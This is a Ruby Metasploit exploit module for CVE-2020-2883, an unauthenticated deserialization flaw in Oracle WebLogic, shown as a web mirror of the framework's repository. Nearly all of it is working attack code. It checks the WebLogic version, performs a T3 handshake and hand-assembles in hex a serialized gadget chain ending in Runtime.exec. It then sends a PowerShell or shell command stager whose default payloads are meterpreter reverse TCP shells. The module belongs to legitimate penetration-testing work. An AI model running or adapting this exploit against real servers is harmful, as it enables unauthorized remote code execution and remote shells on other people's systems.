CoCalc -- weblogic_deserialize_badattr

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
³²⁵⁹⁸ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::CmdStager
11
  include Msf::Exploit::Powershell
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp',
19
        'Description' => %q{
20
          There exists a Java object deserialization vulnerability
21
          in multiple versions of WebLogic.
22

23
          Unauthenticated remote code execution can be achieved by
24
          sending a serialized `BadAttributeValueExpException`
25
          object over the T3 protocol to vulnerable versions of
26
          WebLogic. Leveraging an `ExtractorComparator` enables
27
          the ability to trigger `method.invoke()`, which will
28
          execute arbitrary code.
29
        },
30
        'License' => MSF_LICENSE,
31
        'Author' => [
32
          'Quynh Le', # Vulnerability Discovery
33
          'Y4er', # PoC
34
          'Shelby Pace', # Metasploit Module
35
          'Steve Embling' # T3S additions
36
        ],
37
        'References' => [
38
          [ 'CVE', '2020-2883' ],
39
          [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],
40
        ],
41
        'Privileged' => false,
42
        'Targets' => [
43
          [
44
            'Windows',
45
            {
46
              'Platform' => 'win',
47
              'Arch' => [ ARCH_X86, ARCH_X64 ],
48
              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
49
            }
50
          ],
51
          [
52
            'Unix',
53
            {
54
              'Platform' => %w[unix linux],
55
              'CmdStagerFlavor' => 'printf',
56
              'Arch' => [ ARCH_X86, ARCH_X64 ],
57
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
58
            }
59
          ],
60
        ],
61
        'DisclosureDate' => '2020-04-30',
62
        'DefaultTarget' => 0,
63
        'Notes' => {
64
          'Reliability' => [REPEATABLE_SESSION],
65
          'Stability' => [CRASH_SAFE],
66
          'SideEffects' => [IOC_IN_LOGS]
67
        }
68
      )
69
    )
70

71
    register_options([
72
      Opt::RPORT(7001),
73
    ])
74

75
    register_advanced_options([
76
      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
77
    ])
78
  end
79

80
  def check
81
    connect
82

83
    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
84
    sock.put(web_req)
85
    sleep(2)
86
    res = sock.get
87

88
    versions =
89
      [
90
        Rex::Version.new('12.1.3.0.0'), Rex::Version.new('12.2.1.3.0'),
91
        Rex::Version.new('12.2.1.4.0')
92
      ]
93

94
    return CheckCode::Unknown('Failed to obtain response from service') unless res
95

96
    /WebLogic\s+Server[ -]+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
97
    return CheckCode::Unknown('Failed to detect WebLogic') unless version
98

99
    @version_no = Rex::Version.new(version)
100
    print_status("WebLogic version detected: #{@version_no}")
101

102
    return CheckCode::Appears if versions.include?(@version_no)
103

104
    CheckCode::Detected('Version of WebLogic is not vulnerable')
105
  ensure
106
    disconnect
107
  end
108

109
  def exploit
110
    connect
111
    print_status('Sending handshake...')
112
    t3_handshake
113

114
    if target.name == 'Windows'
115
      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
116
      win_obj.prepend('cmd.exe /c ')
117
      win_obj = build_payload_obj(win_obj)
118
      t3_send(win_obj)
119
    else
120
      execute_cmdstager
121
    end
122
  ensure
123
    disconnect
124
  end
125

126
  def t3_handshake
127
    # t3 12.2.1\nAS:255
128
    # \nHL:19\nMS:100000
129
    # 00\n\n
130
    if !datastore['SSL'] || datastore['FORCE_T3']
131
      shake = '7433'
132
    else
133
      shake = '743373'
134
    end
135
    shake << '2031322e322e310a41533a323535'
136
    shake << '0a484c3a31390a4d533a313030303030'
137
    shake << '30300a0a'
138

139
    sock.put([shake].pack('H*'))
140
    sleep(1)
141
    sock.get_once
142
  end
143

144
  def build_payload_obj(payload_data)
145
    payload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION
146
    payload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23
147
    payload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue
148
    payload_obj << '94da30b4fb3f82b1' # SerialVersionUID
149
    payload_obj << '030002' # 2 fields
150
    payload_obj << '490004' # Integer, field name length: 4
151
    payload_obj << '73697a65' # size
152
    payload_obj << '4c000a' # Object, field name length: 10
153
    payload_obj << '636f6d70617261746f72' # comparator
154
    payload_obj << '740016' # String, field name length: 22
155
    payload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator;
156
    payload_obj << '7870'
157
    payload_obj << '00000002'
158
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
159
    payload_obj << '0030' # Class name length: 48
160
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator
161
    payload_obj << '6d70617261746f722e457874726163746f72436f'
162
    payload_obj << '6d70617261746f72'
163
    payload_obj << extractor_comp_uid # SerialVersionUID
164
    payload_obj << '020001' # Serializable, 1 field
165
    payload_obj << '4c000b' # Object, field name length: 11
166
    payload_obj << '6d5f657874726163746f72' # m_extractor
167
    payload_obj << '740022'
168
    payload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor;
169
    payload_obj << '616c7565457874726163746f723b'
170
    payload_obj << '7870'
171
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
172
    payload_obj << '002c' # Class name length: 44
173
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor
174
    payload_obj << '74726163746f722e436861696e65644578747261'
175
    payload_obj << '63746f72'
176
    payload_obj << chained_extractor_uid # SerialVersionUID
177
    payload_obj << '020000'
178
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
179
    payload_obj << '0036' # Class name length: 54
180
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor
181
    payload_obj << '74726163746f722e4162737472616374436f6d70'
182
    payload_obj << '6f73697465457874726163746f72'
183
    payload_obj << '086b3d8c05690f44' # SerialVersionUID
184
    payload_obj << '020001' # Serializable, 1 field
185
    payload_obj << '5b000c' # array, length: 12
186
    payload_obj << '6d5f61457874726163746f72' # m_aExtractor
187
    payload_obj << '740023' # String, length: 35
188
    payload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor;
189
    payload_obj << '56616c7565457874726163746f723b'
190
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
191
    payload_obj << '002d' # Class name length: 45
192
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor
193
    payload_obj << '74726163746f722e416273747261637445787472'
194
    payload_obj << '6163746f72'
195
    payload_obj << abstract_extractor_uid # SerialVersionUID
196
    payload_obj << '020001' # Serializable, 1 field
197
    payload_obj << '490009' # Integer, field name length: 9
198
    payload_obj << '6d5f6e546172676574' # m_nTarget
199
    payload_obj << '7870'
200
    payload_obj << '00000000'
201
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
202
    payload_obj << '0023' # Class name length: 35
203
    payload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # [Lcom.tangosol.util.ValueExtractor;
204
    payload_obj << '56616c7565457874726163746f723b'
205
    payload_obj << '2246204735c4a0fe' # SerialVersionUID
206
    payload_obj << '020000'
207
    payload_obj << '7870'
208
    payload_obj << '00000003'
209
    payload_obj << '7372'
210
    payload_obj << '002f' # Class name length: 47
211
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor
212
    payload_obj << '74726163746f722e5265666c656374696f6e4578'
213
    payload_obj << '74726163746f72'
214
    payload_obj << reflection_extractor_uid # SerialVersionUID
215
    payload_obj << '02000' # Serializable
216
    payload_obj << reflect_extract_count
217
    payload_obj << '5b0009' # array, length: 9
218
    payload_obj << '6d5f616f506172616d' # m_aoParam
219
    payload_obj << '740013' # String, length: 19
220
    payload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object;
221
    payload_obj << add_sect
222
    payload_obj << '4c0009' # Object, length: 9
223
    payload_obj << '6d5f734d6574686f64' # m_sMethod
224
    payload_obj << '740012' # String, length: 18
225
    payload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;
226
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
227
    payload_obj << '007e0009' # handle
228
    payload_obj << '00000000'
229
    payload_obj << '7572'
230
    payload_obj << '0013' # Class name length: 19
231
    payload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object;
232
    payload_obj << '90ce589f1073296c' # SerialVersionUID
233
    payload_obj << '020000'
234
    payload_obj << '7870'
235
    payload_obj << '00000002'
236
    payload_obj << '74000a' # String, length: 10
237
    payload_obj << '67657452756e74696d65' # getRuntime
238
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
239
    payload_obj << '0012' # Class name length: 18
240
    payload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class;
241
    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
242
    payload_obj << '020000' # Serializable, no fields
243
    payload_obj << '7870'
244
    payload_obj << '00000000'
245
    payload_obj << add_tc_null
246
    payload_obj << '740009' # String, length: 9
247
    payload_obj << '6765744d6574686f64' # getMethod
248
    payload_obj << '7371'
249
    payload_obj << '007e000d' # handle
250
    payload_obj << '00000000'
251
    payload_obj << '7571'
252
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle
253
    payload_obj << '00000002'
254
    payload_obj << '707571'
255
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle
256
    payload_obj << '00000000'
257
    payload_obj << add_tc_null
258
    payload_obj << '740006' # String, length: 6
259
    payload_obj << '696e766f6b65' # invoke
260
    payload_obj << '7371'
261
    payload_obj << '007e000d' # handle
262
    payload_obj << '00000000'
263
    payload_obj << '7571'
264
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle
265
    payload_obj << '00000001'
266
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
267
    payload_obj << '0013' # Class name length: 19
268
    payload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String;
269
    payload_obj << 'add256e7e91d7b47' # SerialVersionUID
270
    payload_obj << '020000'
271
    payload_obj << '7870'
272
    payload_obj << '00000003'
273

274
    payload_bin = format_payload(payload_data)
275
    payload_obj << payload_bin
276

277
    payload_obj << add_tc_null
278
    payload_obj << '740004'
279
    payload_obj << '65786563' # exec
280
    payload_obj << '7704'
281
    payload_obj << '00000003'
282
    payload_obj << '76720011'
283
    payload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime
284
    payload_obj << '0000000000000000000000'
285
    payload_obj << '7870'
286
    payload_obj << '740001'
287
    payload_obj << '3178'
288
  end
289

290
  def extractor_comp_uid
291
    case @version_no
292
    when Rex::Version.new('12.1.3.0.0')
293
      'c7ad6d3a676f3c18'
294
    when Rex::Version.new('12.2.1.3.0')
295
      'fb4ac83df1d72edc'
296
    else
297
      'f9b3bc58cc52cd21'
298
    end
299
  end
300

301
  def change_handle?
302
    @version_no == Rex::Version.new('12.2.1.3.0')
303
  end
304

305
  def chained_extractor_uid
306
    case @version_no
307
    when Rex::Version.new('12.1.3.0.0')
308
      '889f81b0945d5b7f'
309
    when Rex::Version.new('12.2.1.3.0')
310
      '06ee10433a4cc4b4'
311
    else
312
      '435b250b72f63db5'
313
    end
314
  end
315

316
  def abstract_extractor_uid
317
    case @version_no
318
    when Rex::Version.new('12.1.3.0.0')
319
      '658195303e723821'
320
    when Rex::Version.new('12.2.1.3.0')
321
      '752289ad4d460138'
322
    else
323
      '9b1be18ed70100e5'
324
    end
325
  end
326

327
  def reflection_extractor_uid
328
    case @version_no
329
    when Rex::Version.new('12.1.3.0.0')
330
      'ee7ae995c02fb4a2'
331
    when Rex::Version.new('12.2.1.3.0')
332
      '87973791b26429dd'
333
    else
334
      '1f62f564b951b614'
335
    end
336
  end
337

338
  def reflect_extract_count
339
    case @version_no
340
    when Rex::Version.new('12.2.1.3.0')
341
      '3'
342
    else
343
      '2'
344
    end
345
  end
346

347
  def add_sect
348
    sect = ''
349

350
    if @version_no == Rex::Version.new('12.2.1.3.0')
351
      sect << '4c0011' # Object, length: 17
352
      sect << '6d5f657874726163746f' # m_extractorCached
353
      sect << '72436163686564'
354
      sect << '740012'
355
      sect << '4c6a6176612f6c616e67' # Ljava/lang/Object;
356
      sect << '2f4f626a6563743b'
357
    end
358

359
    sect
360
  end
361

362
  def add_tc_null
363
    return '70' if @version_no == Rex::Version.new('12.2.1.3.0')
364

365
    ''
366
  end
367

368
  def t3_send(payload_obj)
369
    print_status('Sending object...')
370

371
    request_obj = '000009f3' # Original packet length
372
    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
373
    request_obj << 'ffffffffffffffff'
374
    request_obj << '00000071'
375
    request_obj << '0000ea60'
376
    request_obj << '00000018432ec6'
377
    request_obj << 'a2a63985b5af7d63e643'
378
    request_obj << '83f42a6d92c9e9af0f94'
379
    request_obj << '72027973720078720178'
380
    request_obj << '720278700000000c0000'
381
    request_obj << '00020000000000000000'
382
    request_obj << '00000001007070707070'
383
    request_obj << '700000000c0000000200'
384
    request_obj << '00000000000000000000'
385
    request_obj << '01007006'
386
    request_obj << 'fe010000' # separator
387
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
388
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
389
    request_obj << '001d' # Class name length: 29
390
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
391
    request_obj << '6a766d2e436c61737354'
392
    request_obj << '61626c65456e747279'
393
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
394
    request_obj << '0c0000' # flags?
395
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
396
    request_obj << '0024' # Class name length: 36
397
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
398
    request_obj << '6f6d6d6f6e2e696e7465'
399
    request_obj << '726e616c2e5061636b61'
400
    request_obj << '6765496e666f'
401
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
402
    request_obj << '020009' # Serializable, 9 fields
403
    request_obj << '490005' # Field type: Int, field name length: 5
404
    request_obj << '6d616a6f72' # major
405
    request_obj << '490005' # Field type: Int, field name length: 5
406
    request_obj << '6d696e6f72' # minor
407
    request_obj << '49000b' # Field type: Int, field name length: 11
408
    request_obj << '70617463685570646174' # patchUpdate
409
    request_obj << '65'
410
    request_obj << '49000c' # Field type: Int, field name length: 12
411
    request_obj << '726f6c6c696e67506174' # rollingPatch
412
    request_obj << '6368'
413
    request_obj << '49000b' # Field type: Int, field name length: 11
414
    request_obj << '73657276696365506163' # servicePack
415
    request_obj << '6b'
416
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
417
    request_obj << '74656d706f7261727950' # temporaryPatch
418
    request_obj << '61746368'
419
    request_obj << '4c0009' # Field type: Object, field name length: 9
420
    request_obj << '696d706c5469746c65' # implTitle
421
    request_obj << '740012' # String, length: 18
422
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
423
    request_obj << '2f537472696e673b'
424
    request_obj << '4c000a' # Field type: Object, field name length: 10
425
    request_obj << '696d706c56656e646f72' # implVendor
426
    request_obj << '71007e0003' # TC_REFERENCE, handle
427
    request_obj << '4c000b' # Field type: Object, field name length: 11
428
    request_obj << '696d706c56657273696f6e' # implVersion
429
    request_obj << '71007e0003' # TC_REFERENCE, handle
430
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
431
    request_obj << '7702' # TC_ENDBLOCKDATA
432
    request_obj << '000078'
433
    request_obj << 'fe010000' # separator
434

435
    request_obj << payload_obj
436

437
    request_obj << 'fe010000' # separator
438
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
439
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
440
    request_obj << '001d' # Class name length: 29
441
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
442
    request_obj << '6a766d2e436c61737354'
443
    request_obj << '61626c65456e747279'
444
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
445
    request_obj << '0c0000'
446
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
447
    request_obj << '0021' # Class name length: 33
448
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
449
    request_obj << '6f6d6d6f6e2e696e7465'
450
    request_obj << '726e616c2e5065657249'
451
    request_obj << '6e666f'
452
    request_obj << '585474f39bc908f1' # SerialVersionUID
453
    request_obj << '020007' # Serializable, 7 fields
454
    request_obj << '490005' # Field type: Int, field name length: 5
455
    request_obj << '6d616a6f72' # major
456
    request_obj << '490005' # Field type: Int, field name length: 5
457
    request_obj << '6d696e6f72' # minor
458
    request_obj << '49000b' # Field type: Int, field name length: 11
459
    request_obj << '70617463685570646174' # patchUpdate
460
    request_obj << '65'
461
    request_obj << '49000c' # Field type: Int, field name length: 12
462
    request_obj << '726f6c6c696e67506174' # rollingPatch
463
    request_obj << '6368'
464
    request_obj << '49000b' # Field type: Int, field name length: 11
465
    request_obj << '73657276696365506163' # servicePack
466
    request_obj << '6b'
467
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
468
    request_obj << '74656d706f7261727950' # temporaryPatch
469
    request_obj << '61746368'
470
    request_obj << '5b0008' # Field type: Array, field name length: 8
471
    request_obj << '7061636b61676573' # packages
472
    request_obj << '740027' # String, length: 39
473
    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
474
    request_obj << '2f636f6d6d6f6e2f696e'
475
    request_obj << '7465726e616c2f506163'
476
    request_obj << '6b616765496e666f3b'
477
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
478
    request_obj << '0024' # Class name length: 36
479
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
480
    request_obj << '6f6d6d6f6e2e696e7465'
481
    request_obj << '726e616c2e5665727369'
482
    request_obj << '6f6e496e666f'
483
    request_obj << '972245516452463e' # SerialVersionUID
484
    request_obj << '020003' # Serializable, 3 fields
485
    request_obj << '5b0008' # Field type: Array, field name length: 8
486
    request_obj << '7061636b61676573' # packages
487
    request_obj << '71007e0003' # TC_REFERENCE, handle
488
    request_obj << '4c000e' # Field type: Object, field name length: 14
489
    request_obj << '72656c65617365566572' # releaseVersion
490
    request_obj << '73696f6e'
491
    request_obj << '740012' # String, length: 18
492
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
493
    request_obj << '2f537472696e673b'
494
    request_obj << '5b0012' # Field type: Array, field name length: 18
495
    request_obj << '76657273696f6e496e66' # versionInfoAsBytes
496
    request_obj << '6f41734279746573'
497
    request_obj << '740002' # String, length: 2
498
    request_obj << '5b42' # [B
499
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
500
    request_obj << '0024' # Class name length: 36
501
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
502
    request_obj << '6f6d6d6f6e2e696e7465'
503
    request_obj << '726e616c2e5061636b61'
504
    request_obj << '6765496e666f'
505
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
506
    request_obj << '020009' # Serializable, 9 fields
507
    request_obj << '490005' # Field type: Int, field name length: 5
508
    request_obj << '6d616a6f72' # major
509
    request_obj << '490005' # Field type: Int, field name length: 5
510
    request_obj << '6d696e6f72' # minor
511
    request_obj << '49000b' # Field type: Int, field name length: 11
512
    request_obj << '70617463685570646174' # patchUpdate
513
    request_obj << '65'
514
    request_obj << '49000c' # Field type: Int, field name length: 12
515
    request_obj << '726f6c6c696e67506174' # rollingPatch
516
    request_obj << '6368'
517
    request_obj << '49000b' # Field type: Int, field name length: 11
518
    request_obj << '73657276696365506163' # servicePack
519
    request_obj << '6b'
520
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
521
    request_obj << '74656d706f7261727950' # temporaryPatch
522
    request_obj << '61746368'
523
    request_obj << '4c0009' # Field type: Object, field name length: 9
524
    request_obj << '696d706c5469746c65' # implTitle
525
    request_obj << '71007e0005' # TC_REFERENCE, handle
526
    request_obj << '4c000a' # Field type: Object, field name length: 10
527
    request_obj << '696d706c56656e646f72' # implVendor
528
    request_obj << '71007e0005' # TC_REFERENCE, handle
529
    request_obj << '4c000b' # Field type: Object, field name length: 11
530
    request_obj << '696d706c56657273696f' # implVersion
531
    request_obj << '6e'
532
    request_obj << '71007e0005' # TC_REFERENCE, handle
533
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
534
    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
535
    request_obj << 'fe00ff' # separator
536
    request_obj << 'fe010000'
537
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
538
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
539
    request_obj << '0013' # Class name length: 19
540
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
541
    request_obj << '6a766d2e4a564d4944'
542
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
543
    request_obj << '0c0000'
544
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
545
    request_obj << '4621'
546
    request_obj << '000000000000000000'
547
    request_obj << '09' # length: 9
548
    request_obj << '3132372e302e312e31' # 127.0.1.1
549
    request_obj << '000b' # length: 11
550
    request_obj << '75732d6c2d627265656e' # us-l-breens
551
    request_obj << '73'
552
    request_obj << 'a53caff10000000700'
553
    request_obj << '001b59'
554
    request_obj << 'ffffffffffffffffffff'
555
    request_obj << 'ffffffffffffffffffff'
556
    request_obj << 'ffffffff'
557
    request_obj << '0078'
558
    request_obj << 'fe010000' # separator
559
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
560
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
561
    request_obj << '0013' # Class name length: 19
562
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
563
    request_obj << '6a766d2e4a564d4944'
564
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
565
    request_obj << '0c0000'
566
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
567
    request_obj << '1d0181401281'
568
    request_obj << '34bf427600093132372e'
569
    request_obj << '302e312e31a53caff1'
570
    request_obj << '000000000078'
571

572
    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
573
    request_obj[0, 8] = new_len
574

575
    sock.put([request_obj].pack('H*'))
576
    sleep(1)
577
  end
578

579
  def format_payload(payload_cmd)
580
    print_status('Formatting payload...')
581
    payload_arr = payload_cmd.split(' ', 3)
582

583
    formatted_payload = ''
584
    payload_arr.each do |part|
585
      formatted_payload << '74' # denotes a string
586
      formatted_payload << part.length.to_s(16).rjust(4, '0')
587
      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
588
    end
589

590
    formatted_payload
591
  end
592

593
  def execute_command(cmd, _opts = {})
594
    cmd.prepend('/bin/sh -c ')
595
    cmd = build_payload_obj(cmd)
596

597
    t3_send(cmd)
598
  end
599
end
600

601
Product

Resources

Company
